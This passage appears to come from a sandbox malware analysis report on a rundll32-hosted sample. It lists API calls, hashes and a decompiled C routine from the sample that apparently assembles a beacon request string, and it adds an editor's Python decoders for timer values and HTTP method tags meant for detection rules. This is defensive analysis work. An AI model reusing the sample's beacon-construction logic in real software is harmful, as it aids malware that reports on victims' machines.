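    omitted; assumption: the printed values are (a_hi, b_lo, b_hi), so the
    multiplicand and the product come back as None.
    """
    m = ALLMUL_RE.search(line)
    if not m:
        return None
    try:
        words = [normalize_word(a) for a in m.group(1).split(",")]
    except ValueError:            # a '?' placeholder in the argument list
        return None
    if len(words) == 4:
        a = to_signed64(words[0], words[1])
        b = to_signed64(words[2], words[3])
        return a, b, wrap_signed64(a * b)
    if len(words) == 3:
        return None, to_signed64(words[1], words[2]), None
    return None


def due_time_seconds(product):
    """Interpret a 64-bit due time as SetWaitableTimer does.

    Negative values are relative intervals in 100 ns units and are returned
    as positive seconds; non-negative values are absolute FILETIMEs and give
    None, as does an unknown product.
    """
    if product is None or product >= 0:
        return None
    return -product / HUNDRED_NS_PER_SECOND


# Two lines taken from the report's API list for this function.
REPORT_LINES = [
    "_allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 04F63B1A",
    "_allmul.NTDLL(00000000,FF676980,000000FF), ref: 04F63AB8",
]


def timer_intervals(lines=REPORT_LINES):
    """Map each decodable line to (multiplier, seconds or None)."""
    out = []
    for line in lines:
        decoded = decode_allmul(line)
        if decoded is None:
            continue
        _, multiplier, product = decoded
        out.append((multiplier, due_time_seconds(product)))
    return out
```

timer_intervals() on the two report lines yields a 60-second relative timer for the first and, for the second, only the -10,000,000 multiplier, which tells you the runtime operand is a count of seconds even though its value is not in the report.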

                            APIs
                            • RtlAllocateHeap.NTDLL ref: 04F7F1E5
                            • GetTickCount.KERNEL32 ref: 04F7F1FF
                            • wsprintfA.USER32 ref: 04F7F252
                            • QueryPerformanceFrequency.KERNEL32(?), ref: 04F7F25E
                            • QueryPerformanceCounter.KERNEL32(?), ref: 04F7F269
                            • _aulldiv.NTDLL(?,?,?,?), ref: 04F7F27F
                            • wsprintfA.USER32 ref: 04F7F295
                            • wsprintfA.USER32 ref: 04F7F2AF
                            • wsprintfA.USER32 ref: 04F7F2D4
                            • HeapFree.KERNEL32(00000000,?), ref: 04F7F2E7
                            • wsprintfA.USER32 ref: 04F7F30B
                            • HeapFree.KERNEL32(00000000,?), ref: 04F7F31E
                            • wsprintfA.USER32 ref: 04F7F358
                            • wsprintfA.USER32 ref: 04F7F37C
                            • lstrcat.KERNEL32(?,?), ref: 04F7F3B4
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F7F3CE
                            • GetTickCount.KERNEL32 ref: 04F7F3DE
                            • RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F7F3F2
                            • RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F7F410
                            • StrTrimA.SHLWAPI(00000000,04F853E8,00000000,0631C310), ref: 04F7F449
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F7F46B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04F7F472
                            • lstrcat.KERNEL32(00000000,?), ref: 04F7F479
                            • lstrcat.KERNEL32(00000000,?), ref: 04F7F480
                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 04F7F4FA
                            • HeapFree.KERNEL32(00000000,?,00000000), ref: 04F7F50C
                            • HeapFree.KERNEL32(00000000,00000000,00000000,0631C310), ref: 04F7F51B
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7F52D
                            • HeapFree.KERNEL32(00000000,?), ref: 04F7F53F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Freewsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveTrim_aulldiv
                            • String ID:
                            • API String ID: 4198993012-0
                            • Opcode ID: 99f7491efd0cb2ba077320abc0010db082d2fdcbd2f39236918144053c339a5a
                            • Instruction ID: effc4ec62c2373b6f5e05f21fa015f4718e56a926721f2a648cea38670e68251
                            • Opcode Fuzzy Hash: 99f7491efd0cb2ba077320abc0010db082d2fdcbd2f39236918144053c339a5a
                            • Instruction Fuzzy Hash: 8EA13D7190020AAFDB01DF68FC84E6A3BE9EF48314F04041EF559DA261D779EC5ADBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(?,00000000,?,?), ref: 04F77B51
                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04F77BED
                            • lstrcpyn.KERNEL32(00000000,?,?), ref: 04F77C02
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F77C1D
                            • StrChrA.SHLWAPI(?,00000020,00000000,?,?,?), ref: 04F77D04
                            • StrChrA.SHLWAPI(00000001,00000020), ref: 04F77D15
                            • lstrlen.KERNEL32(00000000), ref: 04F77D29
                            • memmove.NTDLL(?,?,00000001), ref: 04F77D39
                            • lstrlen.KERNEL32(?,00000000,?,?,?), ref: 04F77D65
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F77D8B
                            • memcpy.NTDLL(00000000,?,?), ref: 04F77D9F
                            • memcpy.NTDLL(?,?,?), ref: 04F77DBF
                            • HeapFree.KERNEL32(00000000,?), ref: 04F77DFB
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F77EC1
                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 04F77F09
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                            • String ID: GET $GET $OPTI$OPTI$POST$PUT
                            • API String ID: 3227826163-647159250
                            • Opcode ID: 4cc0b63ed435cba9958c22993af578feebee780847035abbe3a8ce9d458f966d
                            • Instruction ID: 922b4c925bd8f0c6eba03bd1713d6006b7e2c061ce982a24efe76b9fbfc3c3eb
                            • Opcode Fuzzy Hash: 4cc0b63ed435cba9958c22993af578feebee780847035abbe3a8ce9d458f966d
                            • Instruction Fuzzy Hash: 23E14B71E10209EFDB15EFA8DC84AAABBB9FF04300F14855AE9159B250D738FD52DB90
                            Uniqueness

                            Uniqueness Score: -1.00%
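The strings attached to this function (GET, GET, OPTI, OPTI, POST, PUT) are four-byte prefixes of HTTP method names, and the calls around them (lstrlen, StrChrA with 0x20, the space character, memmove, memcpy into a freshly allocated heap buffer) are what a request-line splitter needs; reading the function as HTTP request-line handling is the editor's inference from those strings and calls, not a statement of the report. Comparing a method by its first four bytes compiles to one 32-bit compare against the little-endian packed string, and those packed constants are what to search for in other dumps or to put in a detection rule. The Python below is an added example of that parsing, written for this page and not taken from the sample or the report; padding "PUT" to "PUT " is an assumption about how the compare is done, and the request line it parses is constructed.

```python
"""Four-byte HTTP method tagging and request-line splitting.

Editor's example, not code from the sample or the report. The method tags
are the report's strings padded to four bytes; the request line is
constructed for the example.
"""
import struct

# Method names as a dword compare would see them. "PUT" appears in the
# report without a trailing space; padding it to "PUT " is an assumption.
METHOD_TAGS = [b"GET ", b"POST", b"OPTI", b"PUT "]


def packed_dword(tag):
    """Little-endian 32-bit value a `cmp dword [ptr], imm32` would use for tag."""
    return struct.unpack("<I", tag)[0]


TAG_TO_DWORD = {tag: packed_dword(tag) for tag in METHOD_TAGS}


def method_tag(request):
    """Return the matching four-byte tag of request, or None.

    Mirrors a dword compare: only the first four bytes are examined, so
    "OPTI" also claims "OPTIONS" and anything else with that prefix, and a
    method outside the table (HEAD, DELETE) is not recognised at all.
    """
    if len(request) < 4:
        return None
    head = struct.unpack("<I", request[:4])[0]
    for tag, value in TAG_TO_DWORD.items():
        if head == value:
            return tag
    return None


def split_request_line(request):
    """Split "METHOD SP target SP version CRLF" the way two StrChrA(' ') calls would.

    Returns (method, target, version) or None when a space is missing; the
    version is whatever follows the second space up to the first CRLF.
    """
    line = request.split(b"\r\n", 1)[0]
    first = line.find(b" ")
    if first < 0:
        return None
    second = line.find(b" ", first + 1)
    if second < 0:
        return None
    return line[:first], line[first + 1:second], line[second + 1:]


def parse_request(request):
    """Combine the tag check and the split; None for input that is not a request line."""
    tag = method_tag(request)
    if tag is None:
        return None
    parts = split_request_line(request)
    if parts is None:
        return None
    method, target, version = parts
    return {"tag": tag, "method": method, "target": target, "version": version}


# Constructed request line for the example.
SAMPLE_REQUEST = b"POST /login HTTP/1.1\r\nHost: example.test\r\n\r\n"
```

packed_dword(b"GET ") is 0x20544547 and packed_dword(b"POST") is 0x54534F50; those are the immediates to expect in the compare instructions, and the reason the report's string list shows the methods cut to four characters.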

                            APIs
                            • RtlAllocateHeap.NTDLL ref: 04F6E65B
                            • wsprintfA.USER32 ref: 04F6E6C5
                            • wsprintfA.USER32 ref: 04F6E70B
                            • wsprintfA.USER32 ref: 04F6E72C
                            • lstrcat.KERNEL32(00000000,?), ref: 04F6E763
                            • wsprintfA.USER32 ref: 04F6E784
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F6E79E
                            • wsprintfA.USER32 ref: 04F6E7C5
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6E7DA
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F6E7F4
                            • RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F6E815
                            • RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F6E82F
                              • Part of subcall function 04F7EA15: lstrlen.KERNEL32(00000000,761F81D0,?,761B5520,7749EEF0,?,00000000,04F6E842,00000000,0631C310), ref: 04F7EA40
                              • Part of subcall function 04F7EA15: lstrlen.KERNEL32(?,?,00000000,04F6E842,00000000,0631C310), ref: 04F7EA48
                              • Part of subcall function 04F7EA15: strcpy.NTDLL ref: 04F7EA5F
                              • Part of subcall function 04F7EA15: lstrcat.KERNEL32(00000000,?), ref: 04F7EA6A
                              • Part of subcall function 04F7EA15: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,04F6E842,00000000,0631C310), ref: 04F7EA87
                            • StrTrimA.SHLWAPI(00000000,04F853E8,00000000,0631C310), ref: 04F6E864
                              • Part of subcall function 04F68DC7: lstrlen.KERNEL32(06318560,761B5520,761F81D0,7749EEF0,04F6E873,?), ref: 04F68DD7
                              • Part of subcall function 04F68DC7: lstrlen.KERNEL32(?), ref: 04F68DDF
                              • Part of subcall function 04F68DC7: lstrcpy.KERNEL32(00000000,06318560), ref: 04F68DF3
                              • Part of subcall function 04F68DC7: lstrcat.KERNEL32(00000000,?), ref: 04F68DFE
                            • lstrcpy.KERNEL32(?,?), ref: 04F6E88D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04F6E897
                            • lstrcat.KERNEL32(00000000,?), ref: 04F6E8A2
                            • lstrcat.KERNEL32(00000000,?), ref: 04F6E8A9
                            • RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F6E8B4
                            • RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F6E8D0
                              • Part of subcall function 04F67DF5: memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,04F75583,00000000,00000000), ref: 04F67E46
                              • Part of subcall function 04F67DF5: memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 04F67ED9
                            • HeapFree.KERNEL32(00000000,?,00000001,0631C310,?,?,?), ref: 04F6E997
                            • HeapFree.KERNEL32(00000000,?,?), ref: 04F6E9AF
                            • HeapFree.KERNEL32(00000000,?,00000000,0631C310), ref: 04F6E9BD
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F6E9CB
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F6E9D6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$lstrcatwsprintf$CriticalSectionlstrlen$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
                            • String ID:
                            • API String ID: 4032678529-0
                            • Opcode ID: e6bf4fb794470bc34439f5fe2950d99257e26879d4e64acef51ea10aa8d8d9e4
                            • Instruction ID: b6882578bbdb382206fb80588ee55d9015393d3a86200d9f8f69a66f63abab39
                            • Opcode Fuzzy Hash: e6bf4fb794470bc34439f5fe2950d99257e26879d4e64acef51ea10aa8d8d9e4
                            • Instruction Fuzzy Hash: 65B13672A04209AFDB01DF68EC84E2A7BE9EF88304F04441EF559DB261D77AEC16DB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E04A1300E(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
                            				intOrPtr _v4;
                            				signed int _v8;
                            				int* _v12;
                            				char* _v16;
                            				intOrPtr _v20;
                            				void* _v24;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				void* _v40;
                            				void* __ebx;
                            				void* __edi;
                            				long _t66;
                            				intOrPtr _t67;
                            				intOrPtr _t68;
                            				intOrPtr _t69;
                            				intOrPtr _t70;
                            				intOrPtr _t71;
                            				void* _t74;
                            				intOrPtr _t75;
                            				int _t78;
                            				intOrPtr _t79;
                            				int _t82;
                            				intOrPtr _t83;
                            				intOrPtr _t84;
                            				void* _t86;
                            				void* _t89;
                            				intOrPtr _t93;
                            				intOrPtr _t97;
                            				intOrPtr* _t99;
                            				int* _t105;
                            				int* _t115;
                            				char** _t117;
                            				char* _t118;
                            				intOrPtr* _t123;
                            				intOrPtr* _t125;
                            				intOrPtr* _t127;
                            				intOrPtr* _t129;
                            				intOrPtr _t132;
                            				intOrPtr _t136;
                            				int _t139;
                            				intOrPtr _t141;
                            				int _t144;
                            				void* _t145;
                            				intOrPtr _t159;
                            				void* _t161;
                            				int _t162;
                            				void* _t163;
                            				void* _t164;
                            				long _t165;
                            				intOrPtr* _t166;
                            				intOrPtr* _t167;
                            				intOrPtr _t168;
                            				intOrPtr* _t171;
                            				char** _t174;
                            				char** _t176;
                            				char** _t177;
                            				void* _t182;
                            
                            				_t66 = __eax;
                            				_t174 =  &_v16;
                            				_t145 = _a20;
                            				_a20 = 8;
                            				if(__eax == 0) {
                            					_t66 = GetTickCount();
                            				}
                            				_t67 =  *0x4a1a018; // 0x59144415
                            				asm("bswap eax");
                            				_t68 =  *0x4a1a014; // 0x3a87c8cd
                            				asm("bswap eax");
                            				_t69 =  *0x4a1a010; // 0xd8d2f808
                            				asm("bswap eax");
                            				_t70 =  *0x4a1a00c; // 0xeec43f25
                            				asm("bswap eax");
                            				_t71 =  *0x4a1a348; // 0xb1d5a8
                            				_t3 = _t71 + 0x4a1b62b; // 0x74666f73
                            				_t162 = wsprintfA(_t145, _t3, 3, 0x3d175, _t70, _t69, _t68, _t67,  *0x4a1a02c,  *0x4a1a004, _t66);
                            				_t74 = E04A16927();
                            				_t75 =  *0x4a1a348; // 0xb1d5a8
                            				_t4 = _t75 + 0x4a1b66b; // 0x74707526
                            				_t78 = wsprintfA(_t162 + _t145, _t4, _t74);
                            				_t176 =  &(_t174[0xe]);
                            				_t163 = _t162 + _t78;
                            				if(_a24 != 0) {
                            					_t141 =  *0x4a1a348; // 0xb1d5a8
                            					_t8 = _t141 + 0x4a1b676; // 0x732526
                            					_t144 = wsprintfA(_t163 + _t145, _t8, _a24);
                            					_t176 =  &(_t176[3]);
                            					_t163 = _t163 + _t144;
                            				}
                            				_t79 =  *0x4a1a348; // 0xb1d5a8
                            				_t10 = _t79 + 0x4a1b78e; // 0x5538d36
                            				_t182 = _a20 - _t10;
                            				_t12 = _t79 + 0x4a1b2de; // 0x74636126
                            				_t157 = 0 | _t182 == 0x00000000;
                            				_t82 = wsprintfA(_t163 + _t145, _t12, _t182 == 0);
                            				_t177 =  &(_t176[3]);
                            				_t164 = _t163 + _t82;
                            				_t83 = E04A122D7(_t10);
                            				_a32 = _t83;
                            				if(_t83 != 0) {
                            					_t136 =  *0x4a1a348; // 0xb1d5a8
                            					_t17 = _t136 + 0x4a1b8d0; // 0x736e6426
                            					_t139 = wsprintfA(_t164 + _t145, _t17, _t83);
                            					_t177 =  &(_t177[3]);
                            					_t164 = _t164 + _t139;
                            					HeapFree( *0x4a1a2d8, 0, _a40);
                            				}
                            				_t84 = E04A12A11();
                            				_a32 = _t84;
                            				if(_t84 != 0) {
                            					_t132 =  *0x4a1a348; // 0xb1d5a8
                            					_t21 = _t132 + 0x4a1b8d8; // 0x6f687726
                            					wsprintfA(_t164 + _t145, _t21, _t84);
                            					_t177 =  &(_t177[3]);
                            					HeapFree( *0x4a1a2d8, 0, _a40);
                            				}
                            				_t159 =  *0x4a1a3cc; // 0x55395b0
                            				_t86 = E04A12509(0x4a1a00a, _t159 + 4);
                            				_t165 = 0;
                            				_a16 = _t86;
                            				if(_t86 == 0) {
                            					L28:
                            					HeapFree( *0x4a1a2d8, _t165, _t145);
                            					return _a44;
                            				} else {
                            					_t89 = RtlAllocateHeap( *0x4a1a2d8, 0, 0x800);
                            					_a24 = _t89;
                            					if(_t89 == 0) {
                            						L27:
                            						HeapFree( *0x4a1a2d8, _t165, _a8);
                            						goto L28;
                            					}
                            					E04A11BE9(GetTickCount());
                            					_t93 =  *0x4a1a3cc; // 0x55395b0
                            					__imp__(_t93 + 0x40);
                            					asm("lock xadd [eax], ecx");
                            					_t97 =  *0x4a1a3cc; // 0x55395b0
                            					__imp__(_t97 + 0x40);
                            					_t99 =  *0x4a1a3cc; // 0x55395b0
                            					_t161 = E04A11D33(1, _t157, _t145,  *_t99);
                            					asm("lock xadd [eax], ecx");
                            					if(_t161 == 0) {
                            						L26:
                            						HeapFree( *0x4a1a2d8, _t165, _a16);
                            						goto L27;
                            					}
                            					StrTrimA(_t161, 0x4a1928c);
                            					_push(_t161);
                            					_t105 = E04A1393C();
                            					_v12 = _t105;
                            					if(_t105 == 0) {
                            						L25:
                            						HeapFree( *0x4a1a2d8, _t165, _t161);
                            						goto L26;
                            					}
                            					_t166 = __imp__;
                            					 *_t166(_t161, _a8);
                            					 *_t166(_a4, _v12);
                            					_t167 = __imp__;
                            					 *_t167(_v4, _v24);
                            					_t168 = E04A161FC( *_t167(_v12, _t161), _v20);
                            					_v36 = _t168;
                            					if(_t168 == 0) {
                            						_v8 = 8;
                            						L23:
                            						E04A1561E();
                            						L24:
                            						HeapFree( *0x4a1a2d8, 0, _v40);
                            						_t165 = 0;
                            						goto L25;
                            					}
                            					_t115 = E04A110B7(_t145, 0xffffffffffffffff, _t161,  &_v24);
                            					_v12 = _t115;
                            					if(_t115 == 0) {
                            						_t171 = _v24;
                            						_v20 = E04A15B9D(_t171, _t168, _v16, _v12);
                            						_t123 =  *((intOrPtr*)(_t171 + 8));
                            						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
                            						_t125 =  *((intOrPtr*)(_t171 + 8));
                            						 *((intOrPtr*)( *_t125 + 8))(_t125);
                            						_t127 =  *((intOrPtr*)(_t171 + 4));
                            						 *((intOrPtr*)( *_t127 + 8))(_t127);
                            						_t129 =  *_t171;
                            						 *((intOrPtr*)( *_t129 + 8))(_t129);
                            						E04A16C2C(_t171);
                            					}
                            					if(_v8 != 0x10d2) {
                            						L18:
                            						if(_v8 == 0) {
                            							_t117 = _v16;
                            							if(_t117 != 0) {
                            								_t118 =  *_t117;
                            								_t169 =  *_v12;
                            								_v16 = _t118;
                            								wcstombs(_t118, _t118,  *_v12);
                            								 *_v24 = E04A13C22(_v16, _v16, _t169 >> 1);
                            							}
                            						}
                            						goto L21;
                            					} else {
                            						if(_v16 != 0) {
                            							L21:
                            							E04A16C2C(_v32);
                            							if(_v12 == 0 || _v8 == 0x10d2) {
                            								goto L24;
                            							} else {
                            								goto L23;
                            							}
                            						}
                            						_v8 = _v8 & 0x00000000;
                            						goto L18;
                            					}
                            				}
                            			}

                            0x04a1300e
                            0x04a1300e
                            0x04a13012
                            0x04a13019
                            0x04a13023
                            0x04a13025
                            0x04a13025
                            0x04a13032
                            0x04a1303d
                            0x04a13040
                            0x04a1304b
                            0x04a1304e
                            0x04a13053
                            0x04a13056
                            0x04a1305b
                            0x04a1305e
                            0x04a1306a
                            0x04a13077
                            0x04a13079
                            0x04a1307f
                            0x04a13084
                            0x04a1308f
                            0x04a13091
                            0x04a13094
                            0x04a1309b
                            0x04a1309d
                            0x04a130a6
                            0x04a130b1
                            0x04a130b3
                            0x04a130b6
                            0x04a130b6
                            0x04a130b8
                            0x04a130bd
                            0x04a130c5
                            0x04a130c9
                            0x04a130cf
                            0x04a130d8
                            0x04a130da
                            0x04a130dd
                            0x04a130df
                            0x04a130ea
                            0x04a130f0
                            0x04a130f3
                            0x04a130f8
                            0x04a13103
                            0x04a13105
                            0x04a1310c
                            0x04a13116
                            0x04a13116
                            0x04a13118
                            0x04a1311d
                            0x04a13123
                            0x04a13126
                            0x04a1312b
                            0x04a13135
                            0x04a13137
                            0x04a13146
                            0x04a13146
                            0x04a13148
                            0x04a13156
                            0x04a1315b
                            0x04a1315d
                            0x04a13163
                            0x04a13343
                            0x04a1334b
                            0x04a13358
                            0x04a13169
                            0x04a13175
                            0x04a1317b
                            0x04a13181
                            0x04a13336
                            0x04a13341
                            0x00000000
                            0x04a13341
                            0x04a1318d
                            0x04a13192
                            0x04a1319b
                            0x04a131ac
                            0x04a131b0
                            0x04a131b9
                            0x04a131bf
                            0x04a131cc
                            0x04a131d9
                            0x04a131df
                            0x04a13329
                            0x04a13334
                            0x00000000
                            0x04a13334
                            0x04a131eb
                            0x04a131f1
                            0x04a131f2
                            0x04a131f7
                            0x04a131fd
                            0x04a1331f
                            0x04a13327
                            0x00000000
                            0x04a13327
                            0x04a13207
                            0x04a1320e
                            0x04a13218
                            0x04a1321e
                            0x04a13228
                            0x04a1323a
                            0x04a1323c
                            0x04a13242
                            0x04a1335b
                            0x04a1330a
                            0x04a1330a
                            0x04a1330f
                            0x04a1331b
                            0x04a1331d
                            0x00000000
                            0x04a1331d
                            0x04a1324d
                            0x04a13252
                            0x04a13258
                            0x04a13263
                            0x04a1326e
                            0x04a13272
                            0x04a13278
                            0x04a1327e
                            0x04a13284
                            0x04a13287
                            0x04a1328d
                            0x04a13290
                            0x04a13295
                            0x04a13299
                            0x04a13299
                            0x04a132a6
                            0x04a132b4
                            0x04a132b9
                            0x04a132bb
                            0x04a132c1
                            0x04a132c7
                            0x04a132c9
                            0x04a132ce
                            0x04a132d2
                            0x04a132ee
                            0x04a132ee
                            0x04a132c1
                            0x00000000
                            0x04a132a8
                            0x04a132ad
                            0x04a132f0
                            0x04a132f4
                            0x04a132fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a132fe
                            0x04a132af
                            0x00000000
                            0x04a132af
                            0x04a132a6

                            APIs
                            • GetTickCount.KERNEL32 ref: 04A13025
                            • wsprintfA.USER32 ref: 04A13072
                            • wsprintfA.USER32 ref: 04A1308F
                            • wsprintfA.USER32 ref: 04A130B1
                            • wsprintfA.USER32 ref: 04A130D8
                            • wsprintfA.USER32 ref: 04A13103
                            • HeapFree.KERNEL32(00000000,?), ref: 04A13116
                            • wsprintfA.USER32 ref: 04A13135
                            • HeapFree.KERNEL32(00000000,?), ref: 04A13146
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04A13175
                            • GetTickCount.KERNEL32 ref: 04A13187
                            • RtlEnterCriticalSection.NTDLL(05539570), ref: 04A1319B
                            • RtlLeaveCriticalSection.NTDLL(05539570), ref: 04A131B9
                              • Part of subcall function 04A11D33: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,746BC740,04A158D7,00000000,055395B0), ref: 04A11D5E
                              • Part of subcall function 04A11D33: lstrlen.KERNEL32(00000000,?,746BC740,04A158D7,00000000,055395B0), ref: 04A11D66
                              • Part of subcall function 04A11D33: strcpy.NTDLL ref: 04A11D7D
                              • Part of subcall function 04A11D33: lstrcat.KERNEL32(00000000,00000000), ref: 04A11D88
                              • Part of subcall function 04A11D33: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04A158D7,?,746BC740,04A158D7,00000000,055395B0), ref: 04A11DA5
                            • StrTrimA.SHLWAPI(00000000,04A1928C,?,055395B0), ref: 04A131EB
                              • Part of subcall function 04A1393C: lstrlen.KERNEL32(05539B68,00000000,00000000,00000000,04A15902,00000000), ref: 04A1394C
                              • Part of subcall function 04A1393C: lstrlen.KERNEL32(?), ref: 04A13954
                              • Part of subcall function 04A1393C: lstrcpy.KERNEL32(00000000,05539B68), ref: 04A13968
                              • Part of subcall function 04A1393C: lstrcat.KERNEL32(00000000,?), ref: 04A13973
                            • lstrcpy.KERNEL32(00000000,?), ref: 04A1320E
                            • lstrcpy.KERNEL32(?,?), ref: 04A13218
                            • lstrcat.KERNEL32(?,?), ref: 04A13228
                            • lstrcat.KERNEL32(?,00000000), ref: 04A1322F
                              • Part of subcall function 04A161FC: lstrlen.KERNEL32(?,00000000,05539D70,00000000,04A139E8,05539F93,69B25F44,?,?,?,?,69B25F44,00000005,04A1A00C,4D283A53,?), ref: 04A16203
                              • Part of subcall function 04A161FC: mbstowcs.NTDLL ref: 04A1622C
                              • Part of subcall function 04A161FC: memset.NTDLL ref: 04A1623E
                            • wcstombs.NTDLL ref: 04A132D2
                              • Part of subcall function 04A15B9D: SysAllocString.OLEAUT32(?), ref: 04A15BD8
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            • HeapFree.KERNEL32(00000000,?), ref: 04A1331B
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04A13327
                            • HeapFree.KERNEL32(00000000,?,?,055395B0), ref: 04A13334
                            • HeapFree.KERNEL32(00000000,?), ref: 04A13341
                            • HeapFree.KERNEL32(00000000,?), ref: 04A1334B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Heap$Free$wsprintf$lstrlen$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                            • String ID:
                            • API String ID: 967369141-0
                            • Opcode ID: 9db71da7cb605330f3a19e13813be297f0087b3dc40b0bb5a985f060945a7bae
                            • Instruction ID: fd1b24f0473f27093aea393e8dfa2e31de488f2d3dbe2fecb5dd93bfb5c53ba2
                            • Opcode Fuzzy Hash: 9db71da7cb605330f3a19e13813be297f0087b3dc40b0bb5a985f060945a7bae
                            • Instruction Fuzzy Hash: A6A18B71502300AFEB11AF64DC48E9A7BE8EF98754F050928F889D7230DB39EC46DB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetLastError.KERNEL32 ref: 04F7CED3
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F7CEEF
                            • GetLastError.KERNEL32 ref: 04F7CF3E
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7CF54
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F7CF68
                            • GetLastError.KERNEL32 ref: 04F7CF82
                            • GetLastError.KERNEL32 ref: 04F7CFB5
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7CFD3
                            • lstrlenW.KERNEL32(00000000,?), ref: 04F7CFFF
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F7D014
                            • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 04F7D0E8
                            • HeapFree.KERNEL32(00000000,?), ref: 04F7D0F7
                            • WaitForSingleObject.KERNEL32(00000000), ref: 04F7D10C
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7D11F
                            • HeapFree.KERNEL32(00000000,?), ref: 04F7D131
                            • RtlExitUserThread.NTDLL(?,?), ref: 04F7D146
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                            • String ID:
                            • API String ID: 3853681310-3916222277
                            • Opcode ID: 29a5a17400a509c25b4f93f45331d21f1e17ffbd73db186d7b9c4eac91757ff5
                            • Instruction ID: a40f6f8c3f479a9de2340afcd77eb296e00e90916f3f7ebbcb06e7265e7fd0f6
                            • Opcode Fuzzy Hash: 29a5a17400a509c25b4f93f45331d21f1e17ffbd73db186d7b9c4eac91757ff5
                            • Instruction Fuzzy Hash: 9F81E77190024EBFDB119FA4EC84EBE7BB8EB09344F04446AF505AB250D779AD46AB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
